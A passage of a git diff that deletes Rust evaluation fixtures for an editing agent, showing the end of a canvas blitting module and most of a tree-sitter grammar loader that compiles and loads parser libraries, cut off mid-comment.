Blits to a rectangle with origin at `dst_point` and size according to `src_size`. - /// If the target area overlaps the boundaries of the canvas, only the drawable region is blitted. - /// `dst_point` and `src_size` are specified in pixels. `src_stride` is specified in bytes. - /// `src_stride` must be equal or larger than the actual data length. - #[allow(dead_code)] - pub(crate) fn blit_from( - &mut self, - dst_point: Vector2I, - src_bytes: &[u8], - src_size: Vector2I, - src_stride: usize, - src_format: Format, - ) { - assert_eq!( - src_stride * src_size.y() as usize, - src_bytes.len(), - "Number of pixels in src_bytes does not match stride and size." - ); - assert!( - src_stride >= src_size.x() as usize * src_format.bytes_per_pixel() as usize, - "src_stride must be >= than src_size.x()" - ); - - let dst_rect = RectI::new(dst_point, src_size); - let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); - let dst_rect = match dst_rect { - Some(dst_rect) => dst_rect, - None => return, - }; - - match (self.format, src_format) { - (Format::A8, Format::A8) - | (Format::Rgb24, Format::Rgb24) - | (Format::Rgba32, Format::Rgba32) => { - self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) - } - (Format::A8, Format::Rgb24) => { - self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) - } - (Format::Rgb24, Format::A8) => { - self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) - } - (Format::Rgb24, Format::Rgba32) => self - .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), - (Format::Rgba32, Format::Rgb24) => self - .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), - (Format::Rgba32, Format::A8) | (Format::A8, Format::Rgba32) => unimplemented!(), - } - } - - #[allow(dead_code)] - pub(crate) fn blit_from_bitmap_1bpp( - &mut self, - dst_point: Vector2I, - src_bytes: &[u8], - src_size: Vector2I, - src_stride: usize, - ) { - if self.format != Format::A8 { - unimplemented!() - } - - let dst_rect = RectI::new(dst_point, src_size); - let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); - let dst_rect = match dst_rect { - Some(dst_rect) => dst_rect, - None => return, - }; - - let size = dst_rect.size(); - - let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; - let dest_row_stride = size.x() as usize * dest_bytes_per_pixel; - let src_row_stride = utils::div_round_up(size.x() as usize, 8); - - for y in 0..size.y() { - let (dest_row_start, src_row_start) = ( - (y + dst_rect.origin_y()) as usize * self.stride - + dst_rect.origin_x() as usize * dest_bytes_per_pixel, - y as usize * src_stride, - ); - let dest_row_end = dest_row_start + dest_row_stride; - let src_row_end = src_row_start + src_row_stride; - let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; - let src_row_pixels = &src_bytes[src_row_start..src_row_end]; - for x in 0..src_row_stride { - let pattern = &BITMAP_1BPP_TO_8BPP_LUT[src_row_pixels[x] as usize]; - let dest_start = x * 8; - let dest_end = cmp::min(dest_start + 8, dest_row_stride); - let src = &pattern[0..(dest_end - dest_start)]; - dest_row_pixels[dest_start..dest_end].clone_from_slice(src); - } - } - } - - /// Blits to area `rect` using the data given in the buffer `src_bytes`. - /// `src_stride` must be specified in bytes. - /// The dimensions of `rect` must be in pixels. - fn blit_from_with( - &mut self, - rect: RectI, - src_bytes: &[u8], - src_stride: usize, - src_format: Format, - ) { - let src_bytes_per_pixel = src_format.bytes_per_pixel() as usize; - let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; - - for y in 0..rect.height() { - let (dest_row_start, src_row_start) = ( - (y + rect.origin_y()) as usize * self.stride - + rect.origin_x() as usize * dest_bytes_per_pixel, - y as usize * src_stride, - ); - let dest_row_end = dest_row_start + rect.width() as usize * dest_bytes_per_pixel; - let src_row_end = src_row_start + rect.width() as usize * src_bytes_per_pixel; - let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; - let src_row_pixels = &src_bytes[src_row_start..src_row_end]; - B::blit(dest_row_pixels, src_row_pixels) - } - } -} - -impl fmt::Debug for Canvas { - fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { - f.debug_struct("Canvas") - .field("pixels", &self.pixels.len()) // Do not dump a vector content. - .field("size", &self.size) - .field("stride", &self.stride) - .field("format", &self.format) - .finish() - } -} - -/// The image format for the canvas. -#[derive(Clone, Copy, Debug, PartialEq)] -pub enum Format { - /// Premultiplied R8G8B8A8, little-endian. - Rgba32, - /// R8G8B8, little-endian. - Rgb24, - /// A8. - A8, -} - -impl Format { - /// Returns the number of bits per pixel that this image format corresponds to. - #[inline] - pub fn bits_per_pixel(self) -> u8 { - match self { - Format::Rgba32 => 32, - Format::Rgb24 => 24, - Format::A8 => 8, - } - } - - /// Returns the number of color channels per pixel that this image format corresponds to. - #[inline] - pub fn components_per_pixel(self) -> u8 { - match self { - Format::Rgba32 => 4, - Format::Rgb24 => 3, - Format::A8 => 1, - } - } - - /// Returns the number of bits per color channel that this image format contains. - #[inline] - pub fn bits_per_component(self) -> u8 { - self.bits_per_pixel() / self.components_per_pixel() - } - - /// Returns the number of bytes per pixel that this image format corresponds to. - #[inline] - pub fn bytes_per_pixel(self) -> u8 { - self.bits_per_pixel() / 8 - } -} - -/// The antialiasing strategy that should be used when rasterizing glyphs. -#[derive(Clone, Copy, Debug, PartialEq)] -pub enum RasterizationOptions { - /// "Black-and-white" rendering. Each pixel is either entirely on or off. - Bilevel, - /// Grayscale antialiasing. Only one channel is used. - GrayscaleAa, - /// Subpixel RGB antialiasing, for LCD screens. - SubpixelAa, -} - -trait Blit { - fn blit(dest: &mut [u8], src: &[u8]); -} - -struct BlitMemcpy; - -impl Blit for BlitMemcpy { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - dest.clone_from_slice(src) - } -} - -struct BlitRgb24ToA8; - -impl Blit for BlitRgb24ToA8 { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - // TODO(pcwalton): SIMD. - for (dest, src) in dest.iter_mut().zip(src.chunks(3)) { - *dest = src[1] - } - } -} - -struct BlitA8ToRgb24; - -impl Blit for BlitA8ToRgb24 { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - for (dest, src) in dest.chunks_mut(3).zip(src.iter()) { - dest[0] = *src; - dest[1] = *src; - dest[2] = *src; - } - } -} - -struct BlitRgba32ToRgb24; - -impl Blit for BlitRgba32ToRgb24 { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - // TODO(pcwalton): SIMD. - for (dest, src) in dest.chunks_mut(3).zip(src.chunks(4)) { - dest.copy_from_slice(&src[0..3]) - } - } -} - -struct BlitRgb24ToRgba32; - -impl Blit for BlitRgb24ToRgba32 { - fn blit(dest: &mut [u8], src: &[u8]) { - for (dest, src) in dest.chunks_mut(4).zip(src.chunks(3)) { - dest[0] = src[0]; - dest[1] = src[1]; - dest[2] = src[2]; - dest[3] = 255; - } - } -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs b/crates/agent/src/edit_agent/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs deleted file mode 100644 index cfa28fe1ad6091..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs +++ /dev/null @@ -1,1629 +0,0 @@ -#![doc = include_str!("../README.md")] -#![cfg_attr(docsrs, feature(doc_cfg))] - -#[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] -use std::ops::Range; -#[cfg(feature = "tree-sitter-highlight")] -use std::sync::Mutex; -use std::{ - collections::HashMap, - env, - ffi::{OsStr, OsString}, - fs, - io::{BufRead, BufReader}, - mem, - path::{Path, PathBuf}, - process::Command, - sync::LazyLock, - time::SystemTime, -}; - -#[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] -use anyhow::Error; -use anyhow::{Context as _, Result, anyhow}; -use etcetera::BaseStrategy as _; -use fs4::fs_std::FileExt; -use indoc::indoc; -use libloading::{Library, Symbol}; -use once_cell::unsync::OnceCell; -use path_slash::PathBufExt as _; -use regex::{Regex, RegexBuilder}; -use semver::Version; -use serde::{Deserialize, Deserializer, Serialize}; -use tree_sitter::Language; -#[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] -use tree_sitter::QueryError; -#[cfg(feature = "tree-sitter-highlight")] -use tree_sitter::QueryErrorKind; -#[cfg(feature = "tree-sitter-highlight")] -use tree_sitter_highlight::HighlightConfiguration; -#[cfg(feature = "tree-sitter-tags")] -use tree_sitter_tags::{Error as TagsError, TagsConfiguration}; -use url::Url; - -static GRAMMAR_NAME_REGEX: LazyLock = - LazyLock::new(|| Regex::new(r#""name":\s*"(.*?)""#).unwrap()); - -pub const EMSCRIPTEN_TAG: &str = concat!("docker.io/emscripten/emsdk:", env!("EMSCRIPTEN_VERSION")); - -#[derive(Default, Deserialize, Serialize)] -pub struct Config { - #[serde(default)] - #[serde( - rename = "parser-directories", - deserialize_with = "deserialize_parser_directories" - )] - pub parser_directories: Vec, -} - -#[derive(Serialize, Deserialize, Clone, Default)] -#[serde(untagged)] -pub enum PathsJSON { - #[default] - Empty, - Single(PathBuf), - Multiple(Vec), -} - -impl PathsJSON { - fn into_vec(self) -> Option> { - match self { - Self::Empty => None, - Self::Single(s) => Some(vec![s]), - Self::Multiple(s) => Some(s), - } - } - - const fn is_empty(&self) -> bool { - matches!(self, Self::Empty) - } -} - -#[derive(Serialize, Deserialize, Clone)] -#[serde(untagged)] -pub enum PackageJSONAuthor { - String(String), - Object { - name: String, - email: Option, - url: Option, - }, -} - -#[derive(Serialize, Deserialize, Clone)] -#[serde(untagged)] -pub enum PackageJSONRepository { - String(String), - Object { url: String }, -} - -#[derive(Serialize, Deserialize)] -pub struct PackageJSON { - pub name: String, - pub version: Version, - pub description: Option, - pub author: Option, - pub maintainers: Option>, - pub license: Option, - pub repository: Option, - #[serde(default)] - #[serde(rename = "tree-sitter", skip_serializing_if = "Option::is_none")] - pub tree_sitter: Option>, -} - -fn default_path() -> PathBuf { - PathBuf::from(".") -} - -#[derive(Serialize, Deserialize, Clone)] -#[serde(rename_all = "kebab-case")] -pub struct LanguageConfigurationJSON { - #[serde(default = "default_path")] - pub path: PathBuf, - pub scope: Option, - pub file_types: Option>, - pub content_regex: Option, - pub first_line_regex: Option, - pub injection_regex: Option, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub highlights: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub injections: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub locals: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub tags: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub external_files: PathsJSON, -} - -#[derive(Serialize, Deserialize)] -#[serde(rename_all = "kebab-case")] -pub struct TreeSitterJSON { - #[serde(rename = "$schema")] - pub schema: Option, - pub grammars: Vec, - pub metadata: Metadata, - #[serde(default)] - pub bindings: Bindings, -} - -impl TreeSitterJSON { - pub fn from_file(path: &Path) -> Result { - Ok(serde_json::from_str(&fs::read_to_string( - path.join("tree-sitter.json"), - )?)?) - } - - #[must_use] - pub fn has_multiple_language_configs(&self) -> bool { - self.grammars.len() > 1 - } -} - -#[derive(Serialize, Deserialize)] -#[serde(rename_all = "kebab-case")] -pub struct Grammar { - pub name: String, - #[serde(skip_serializing_if = "Option::is_none")] - pub camelcase: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub title: Option, - pub scope: String, - #[serde(skip_serializing_if = "Option::is_none")] - pub path: Option, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub external_files: PathsJSON, - pub file_types: Option>, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub highlights: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub injections: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub locals: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub tags: PathsJSON, - #[serde(skip_serializing_if = "Option::is_none")] - pub injection_regex: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub first_line_regex: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub content_regex: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub class_name: Option, -} - -#[derive(Serialize, Deserialize)] -pub struct Metadata { - pub version: Version, - #[serde(skip_serializing_if = "Option::is_none")] - pub license: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub description: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub authors: Option>, - #[serde(skip_serializing_if = "Option::is_none")] - pub links: Option, - #[serde(skip)] - pub namespace: Option, -} - -#[derive(Serialize, Deserialize)] -pub struct Author { - pub name: String, - #[serde(skip_serializing_if = "Option::is_none")] - pub email: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub url: Option, -} - -#[derive(Serialize, Deserialize)] -pub struct Links { - pub repository: Url, - #[serde(skip_serializing_if = "Option::is_none")] - pub funding: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub homepage: Option, -} - -#[derive(Serialize, Deserialize)] -#[serde(default)] -pub struct Bindings { - pub c: bool, - pub go: bool, - #[serde(skip)] - pub java: bool, - #[serde(skip)] - pub kotlin: bool, - pub node: bool, - pub python: bool, - pub rust: bool, - pub swift: bool, - pub zig: bool, -} - -impl Default for Bindings { - fn default() -> Self { - Self { - c: true, - go: true, - java: false, - kotlin: false, - node: true, - python: true, - rust: true, - swift: true, - zig: false, - } - } -} - -// Replace `~` or `$HOME` with home path string. -// (While paths like "~/.tree-sitter/config.json" can be deserialized, -// they're not valid path for I/O modules.) -fn deserialize_parser_directories<'de, D>(deserializer: D) -> Result, D::Error> -where - D: Deserializer<'de>, -{ - let paths = Vec::::deserialize(deserializer)?; - let Ok(home) = etcetera::home_dir() else { - return Ok(paths); - }; - let standardized = paths - .into_iter() - .map(|path| standardize_path(path, &home)) - .collect(); - Ok(standardized) -} - -fn standardize_path(path: PathBuf, home: &Path) -> PathBuf { - if let Ok(p) = path.strip_prefix("~") { - return home.join(p); - } - if let Ok(p) = path.strip_prefix("$HOME") { - return home.join(p); - } - path -} - -impl Config { - #[must_use] - pub fn initial() -> Self { - let home_dir = etcetera::home_dir().expect("Cannot determine home directory"); - Self { - parser_directories: vec![ - home_dir.join("github"), - home_dir.join("src"), - home_dir.join("source"), - home_dir.join("projects"), - home_dir.join("dev"), - home_dir.join("git"), - ], - } - } -} - -const BUILD_TARGET: &str = env!("BUILD_TARGET"); -const BUILD_HOST: &str = env!("BUILD_HOST"); - -pub struct LanguageConfiguration<'a> { - pub scope: Option, - pub content_regex: Option, - pub first_line_regex: Option, - pub injection_regex: Option, - pub file_types: Vec, - pub root_path: PathBuf, - pub highlights_filenames: Option>, - pub injections_filenames: Option>, - pub locals_filenames: Option>, - pub tags_filenames: Option>, - pub language_name: String, - language_id: usize, - #[cfg(feature = "tree-sitter-highlight")] - highlight_config: OnceCell>, - #[cfg(feature = "tree-sitter-tags")] - tags_config: OnceCell>, - #[cfg(feature = "tree-sitter-highlight")] - highlight_names: &'a Mutex>, - #[cfg(feature = "tree-sitter-highlight")] - use_all_highlight_names: bool, -} - -pub struct Loader { - pub parser_lib_path: PathBuf, - languages_by_id: Vec<(PathBuf, OnceCell, Option>)>, - language_configurations: Vec>, - language_configuration_ids_by_file_type: HashMap>, - language_configuration_in_current_path: Option, - language_configuration_ids_by_first_line_regex: HashMap>, - #[cfg(feature = "tree-sitter-highlight")] - highlight_names: Box>>, - #[cfg(feature = "tree-sitter-highlight")] - use_all_highlight_names: bool, - debug_build: bool, - sanitize_build: bool, - force_rebuild: bool, - - #[cfg(feature = "wasm")] - wasm_store: Mutex>, -} - -pub struct CompileConfig<'a> { - pub src_path: &'a Path, - pub header_paths: Vec<&'a Path>, - pub parser_path: PathBuf, - pub scanner_path: Option, - pub external_files: Option<&'a [PathBuf]>, - pub output_path: Option, - pub flags: &'a [&'a str], - pub sanitize: bool, - pub name: String, -} - -impl<'a> CompileConfig<'a> { - #[must_use] - pub fn new( - src_path: &'a Path, - externals: Option<&'a [PathBuf]>, - output_path: Option, - ) -> Self { - Self { - src_path, - header_paths: vec![src_path], - parser_path: src_path.join("parser.c"), - scanner_path: None, - external_files: externals, - output_path, - flags: &[], - sanitize: false, - name: String::new(), - } - } -} - -unsafe impl Sync for Loader {} - -impl Loader { - pub fn new() -> Result { - let parser_lib_path = if let Ok(path) = env::var("TREE_SITTER_LIBDIR") { - PathBuf::from(path) - } else { - if cfg!(target_os = "macos") { - let legacy_apple_path = etcetera::base_strategy::Apple::new()? - .cache_dir() // `$HOME/Library/Caches/` - .join("tree-sitter"); - if legacy_apple_path.exists() && legacy_apple_path.is_dir() { - std::fs::remove_dir_all(legacy_apple_path)?; - } - } - - etcetera::choose_base_strategy()? - .cache_dir() - .join("tree-sitter") - .join("lib") - }; - Ok(Self::with_parser_lib_path(parser_lib_path)) - } - - #[must_use] - pub fn with_parser_lib_path(parser_lib_path: PathBuf) -> Self { - Self { - parser_lib_path, - languages_by_id: Vec::new(), - language_configurations: Vec::new(), - language_configuration_ids_by_file_type: HashMap::new(), - language_configuration_in_current_path: None, - language_configuration_ids_by_first_line_regex: HashMap::new(), - #[cfg(feature = "tree-sitter-highlight")] - highlight_names: Box::new(Mutex::new(Vec::new())), - #[cfg(feature = "tree-sitter-highlight")] - use_all_highlight_names: true, - debug_build: false, - sanitize_build: false, - force_rebuild: false, - - #[cfg(feature = "wasm")] - wasm_store: Mutex::default(), - } - } - - #[cfg(feature = "tree-sitter-highlight")] - #[cfg_attr(docsrs, doc(cfg(feature = "tree-sitter-highlight")))] - pub fn configure_highlights(&mut self, names: &[String]) { - self.use_all_highlight_names = false; - let mut highlights = self.highlight_names.lock().unwrap(); - highlights.clear(); - highlights.extend(names.iter().cloned()); - } - - #[must_use] - #[cfg(feature = "tree-sitter-highlight")] - #[cfg_attr(docsrs, doc(cfg(feature = "tree-sitter-highlight")))] - pub fn highlight_names(&self) -> Vec { - self.highlight_names.lock().unwrap().clone() - } - - pub fn find_all_languages(&mut self, config: &Config) -> Result<()> { - if config.parser_directories.is_empty() { - eprintln!("Warning: You have not configured any parser directories!"); - eprintln!("Please run `tree-sitter init-config` and edit the resulting"); - eprintln!("configuration file to indicate where we should look for"); - eprintln!("language grammars.\n"); - } - for parser_container_dir in &config.parser_directories { - if let Ok(entries) = fs::read_dir(parser_container_dir) { - for entry in entries { - let entry = entry?; - if let Some(parser_dir_name) = entry.file_name().to_str() { - if parser_dir_name.starts_with("tree-sitter-") { - self.find_language_configurations_at_path( - &parser_container_dir.join(parser_dir_name), - false, - ) - .ok(); - } - } - } - } - } - Ok(()) - } - - pub fn languages_at_path(&mut self, path: &Path) -> Result> { - if let Ok(configurations) = self.find_language_configurations_at_path(path, true) { - let mut language_ids = configurations - .iter() - .map(|c| (c.language_id, c.language_name.clone())) - .collect::>(); - language_ids.sort_unstable(); - language_ids.dedup(); - language_ids - .into_iter() - .map(|(id, name)| Ok((self.language_for_id(id)?, name))) - .collect::>>() - } else { - Ok(Vec::new()) - } - } - - #[must_use] - pub fn get_all_language_configurations(&self) -> Vec<(&LanguageConfiguration, &Path)> { - self.language_configurations - .iter() - .map(|c| (c, self.languages_by_id[c.language_id].0.as_ref())) - .collect() - } - - pub fn language_configuration_for_scope( - &self, - scope: &str, - ) -> Result> { - for configuration in &self.language_configurations { - if configuration.scope.as_ref().is_some_and(|s| s == scope) { - let language = self.language_for_id(configuration.language_id)?; - return Ok(Some((language, configuration))); - } - } - Ok(None) - } - - pub fn language_configuration_for_first_line_regex( - &self, - path: &Path, - ) -> Result> { - self.language_configuration_ids_by_first_line_regex - .iter() - .try_fold(None, |_, (regex, ids)| { - if let Some(regex) = Self::regex(Some(regex)) { - let file = fs::File::open(path)?; - let reader = BufReader::new(file); - let first_line = reader.lines().next().transpose()?; - if let Some(first_line) = first_line { - if regex.is_match(&first_line) && !ids.is_empty() { - let configuration = &self.language_configurations[ids[0]]; - let language = self.language_for_id(configuration.language_id)?; - return Ok(Some((language, configuration))); - } - } - } - - Ok(None) - }) - } - - pub fn language_configuration_for_file_name( - &self, - path: &Path, - ) -> Result> { - // Find all the language configurations that match this file name - // or a suffix of the file name. - let configuration_ids = path - .file_name() - .and_then(|n| n.to_str()) - .and_then(|file_name| self.language_configuration_ids_by_file_type.get(file_name)) - .or_else(|| { - let mut path = path.to_owned(); - let mut extensions = Vec::with_capacity(2); - while let Some(extension) = path.extension() { - extensions.push(extension.to_str()?.to_string()); - path = PathBuf::from(path.file_stem()?.to_os_string()); - } - extensions.reverse(); - self.language_configuration_ids_by_file_type - .get(&extensions.join(".")) - }); - - if let Some(configuration_ids) = configuration_ids { - if !configuration_ids.is_empty() { - let configuration = if configuration_ids.len() == 1 { - &self.language_configurations[configuration_ids[0]] - } - // If multiple language configurations match, then determine which - // one to use by applying the configurations' content regexes. - else { - let file_contents = fs::read(path) - .with_context(|| format!("Failed to read path {}", path.display()))?; - let file_contents = String::from_utf8_lossy(&file_contents); - let mut best_score = -2isize; - let mut best_configuration_id = None; - for configuration_id in configuration_ids { - let config = &self.language_configurations[*configuration_id]; - - // If the language configuration has a content regex, assign - // a score based on the length of the first match. - let score; - if let Some(content_regex) = &config.content_regex { - if let Some(mat) = content_regex.find(&file_contents) { - score = (mat.end() - mat.start()) as isize; - } - // If the content regex does not match, then *penalize* this - // language configuration, so that language configurations - // without content regexes are preferred over those with - // non-matching content regexes. - else { - score = -1; - } - } else { - score = 0; - } - if score > best_score { - best_configuration_id = Some(*configuration_id); - best_score = score; - } - } - - &self.language_configurations[best_configuration_id.unwrap()] - }; - - let language = self.language_for_id(configuration.language_id)?; - return Ok(Some((language, configuration))); - } - } - - Ok(None) - } - - pub fn language_configuration_for_injection_string( - &self, - string: &str, - ) -> Result> { - let mut best_match_length = 0; - let mut best_match_position = None; - for (i, configuration) in self.language_configurations.iter().enumerate() { - if let Some(injection_regex) = &configuration.injection_regex { - if let Some(mat) = injection_regex.find(string) { - let length = mat.end() - mat.start(); - if length > best_match_length { - best_match_position = Some(i); - best_match_length = length; - } - } - } - } - - if let Some(i) = best_match_position { - let configuration = &self.language_configurations[i]; - let language = self.language_for_id(configuration.language_id)?; - Ok(Some((language, configuration))) - } else { - Ok(None) - } - } - - pub fn language_for_configuration( - &self, - configuration: &LanguageConfiguration, - ) -> Result { - self.language_for_id(configuration.language_id) - } - - fn language_for_id(&self, id: usize) -> Result { - let (path, language, externals) = &self.languages_by_id[id]; - language - .get_or_try_init(|| { - let src_path = path.join("src"); - self.load_language_at_path(CompileConfig::new( - &src_path, - externals.as_deref(), - None, - )) - }) - .cloned() - } - - pub fn compile_parser_at_path( - &self, - grammar_path: &Path, - output_path: PathBuf, - flags: &[&str], - ) -> Result<()> { - let src_path = grammar_path.join("src"); - let mut config = CompileConfig::new(&src_path, None, Some(output_path)); - config.flags = flags; - self.load_language_at_path(config).map(|_| ()) - } - - pub fn load_language_at_path(&self, mut config: CompileConfig) -> Result { - let grammar_path = config.src_path.join("grammar.json"); - config.name = Self::grammar_json_name(&grammar_path)?; - self.load_language_at_path_with_name(config) - } - - pub fn load_language_at_path_with_name(&self, mut config: CompileConfig) -> Result { - let mut lib_name = config.name.to_string(); - let language_fn_name = format!( - "tree_sitter_{}", - replace_dashes_with_underscores(&config.name) - ); - if self.debug_build { - lib_name.push_str(".debug._"); - } - - if self.sanitize_build { - lib_name.push_str(".sanitize._"); - config.sanitize = true; - } - - if config.output_path.is_none() { - fs::create_dir_all(&self.parser_lib_path)?; - } - - let mut recompile = self.force_rebuild || config.output_path.is_some(); // if specified, always recompile - - let output_path = config.output_path.unwrap_or_else(|| { - let mut path = self.parser_lib_path.join(lib_name); - path.set_extension(env::consts::DLL_EXTENSION); - #[cfg(feature = "wasm")] - if self.wasm_store.lock().unwrap().is_some() { - path.set_extension("wasm"); - } - path - }); - config.output_path = Some(output_path.clone()); - - let parser_path = config.src_path.join("parser.c"); - config.scanner_path = self.get_scanner_path(config.src_path); - - let mut paths_to_check = vec![parser_path]; - - if let Some(scanner_path) = config.scanner_path.as_ref() { - paths_to_check.push(scanner_path.clone()); - } - - paths_to_check.extend( - config - .external_files - .unwrap_or_default() - .iter() - .map(|p| config.src_path.join(p)), - ); - - if !recompile { - recompile = needs_recompile(&output_path, &paths_to_check) - .with_context(|| "Failed to compare source and binary timestamps")?; - } - - #[cfg(feature = "wasm")] - if let Some(wasm_store) = self.wasm_store.lock().unwrap().as_mut() { - if recompile { - self.compile_parser_to_wasm( - &config.name, - None, - config.src_path, - config - .scanner_path - .as_ref() - .and_then(|p| p.strip_prefix(config.src_path).ok()), - &output_path, - false, - )?; - } - - let wasm_bytes = fs::read(&output_path)?; - return Ok(wasm_store.load_language(&config.name, &wasm_bytes)?); - } - - let lock_path = if env::var("CROSS_RUNNER").is_ok() { - tempfile::tempdir() - .unwrap() - .path() - .join("tree-sitter") - .join("lock") - .join(format!("{}.lock", config.name)) - } else { - etcetera::choose_base_strategy()? - .cache_dir() - .join("tree-sitter") - .join("lock") - .join(format!("{}.lock", config.name)) - }; - - if let Ok(lock_file) = fs::OpenOptions::new().write(true).open(&lock_path) { - recompile = false; - if lock_file.try_lock_exclusive().is_err() { - // if we can't acquire the lock, another process is compiling the parser, wait for - // it and don't recompile - lock_file.lock_exclusive()?; - recompile = false; - } else { - // if we can acquire the lock, check if the lock file is older than 30 seconds, a - // run that was interrupted and left the lock file behind should not block - // subsequent runs - let time = lock_file.metadata()?.modified()?.elapsed()?.as_secs(); - if time > 30 { - fs::remove_file(&lock_path)?; - recompile = true; - } - } - } - - if recompile { - fs::create_dir_all(lock_path.parent().unwrap()).with_context(|| { - format!( - "Failed to create directory {}", - lock_path.parent().unwrap().display() - ) - })?; - let lock_file = fs::OpenOptions::new() - .create(true) - .truncate(true) - .write(true) - .open(&lock_path)?; - lock_file.lock_exclusive()?; - - self.compile_parser_to_dylib(&config, &lock_file, &lock_path)?; - - if config.scanner_path.is_some() { - self.check_external_scanner(&config.name, &output_path)?; - } - } - - let library = unsafe { Library::new(&output_path) } - .with_context(|| format!("Error opening dynamic library {}", output_path.display()))?; - let language = unsafe { - let language_fn = library - .get:: Language>>(language_fn_name.as_bytes()) - .with_context(|| format!("Failed to load symbol {language_fn_name}"))?; - language_fn() - }; - mem::forget(library); - Ok(language) - } - - fn compile_parser_to_dylib( - &self, - config: &CompileConfig, - lock_file: &fs::File, - lock_path: &Path, - ) -> Result<(), Error> { - let mut cc_config = cc::Build::new(); - cc_config - .cargo_metadata(false) - .cargo_warnings(false) - .target(BUILD_TARGET) - .host(BUILD_HOST) - .debug(self.debug_build) - .file(&config.parser_path) - .includes(&config.header_paths) - .std("c11"); - - if let Some(scanner_path) = config.scanner_path.as_ref() { - cc_config.file(scanner_path); - } - - if self.debug_build { - cc_config.opt_level(0).extra_warnings(true); - } else { - cc_config.opt_level(2).extra_warnings(false); - } - - for flag in config.flags { - cc_config.define(flag, None); - } - - let compiler = cc_config.get_compiler(); - let mut command = Command::new(compiler.path()); - command.args(compiler.args()); - for (key, value) in compiler.env() { - command.env(key, value); - } - - let output_path = config.output_path.as_ref().unwrap(); - - if compiler.is_like_msvc() { - let out = format!("-out:{}", output_path.to_str().unwrap()); - command.arg(if self.debug_build { "-LDd" } else { "-LD" }); - command.arg("-utf-8"); - command.args(cc_config.get_files()); - command.arg("-link").arg(out); - } else { - command.arg("-Werror=implicit-function-declaration"); - if cfg!(any(target_os = "macos", target_os = "ios")) { - command.arg("-dynamiclib"); - // TODO: remove when supported - command.arg("-UTREE_SITTER_REUSE_ALLOCATOR"); - } else { - command.arg("-shared"); - } - command.args(cc_config.get_files()); - command.arg("-o").arg(output_path); - } - - let output = command.output().with_context(|| { - format!("Failed to execute the C compiler with the following command:\n{command:?}") - })?; - - FileExt::unlock(lock_file)?; - fs::remove_file(lock_path)?; - anyhow::ensure!( - output.status.success(), - "Parser compilation failed.\nStdout: {}\nStderr: {}", - String::from_utf8_lossy(&output.stdout), - String::from_utf8_lossy(&output.stderr) - ); - Ok(()) - } - - #[cfg(unix)] - fn check_external_scanner(&self, name: &str, library_path: &Path) -> Result<()> { - let prefix = if cfg!(any(target_os = "macos", target_os = "ios")) { - "_" - } else { - "" - }; - let mut must_have = vec![ - format!("{prefix}tree_sitter_{name}_external_scanner_create"), - format!("{prefix}tree_sitter_{name}_external_scanner_destroy"), - format!("{prefix}tree_sitter_{name}_external_scanner_serialize"), - format!("{prefix}tree_sitter_{name}_external_scanner_deserialize"), - format!("{prefix}tree_sitter_{name}_external_scanner_scan"), - ]; - - let command = Command::new("nm") - .arg("-W") - .arg("-U") - .arg(library_path) - .output(); - if let Ok(output) = command { - if output.status.success() { - let mut found_non_static = false; - for line in String::from_utf8_lossy(&output.stdout).lines() { - if line.contains(" T ") { - if let Some(function_name) = - line.split_whitespace().collect::>().get(2) - { - if !line.contains("tree_sitter_") { - if !found_non_static { - found_non_static = true; - eprintln!( - "Warning: Found non-static non-tree-sitter functions in the external scanner" - ); - } - eprintln!(" `{function_name}`"); - } else { - must_have.retain(|f| f != function_name); - } - } - } - } - if found_non_static { - eprintln!( - "Consider making these functions static, they can cause conflicts when another tree-sitter project uses the same function name" - ); - } - - if !must_have.is_empty() { - let missing = must_have - .iter() - .map(|f| format!(" `{f}`")) - .collect::>() - .join("\n"); - anyhow::bail!(format!(indoc! {" - Missing required functions in the external scanner, parsing won't work without these! - - {missing} - - You can read more about this at https://tree-sitter.github.io/tree-sitter/creating-parsers/4-external-scanners - "})); - } - } - } - - Ok(()) - } - - #[cfg(windows)] - fn check_external_scanner(&self, _name: &str, _library_path: &Path) -> Result<()> { - // TODO: there's no nm command on windows, whoever wants to implement this can and 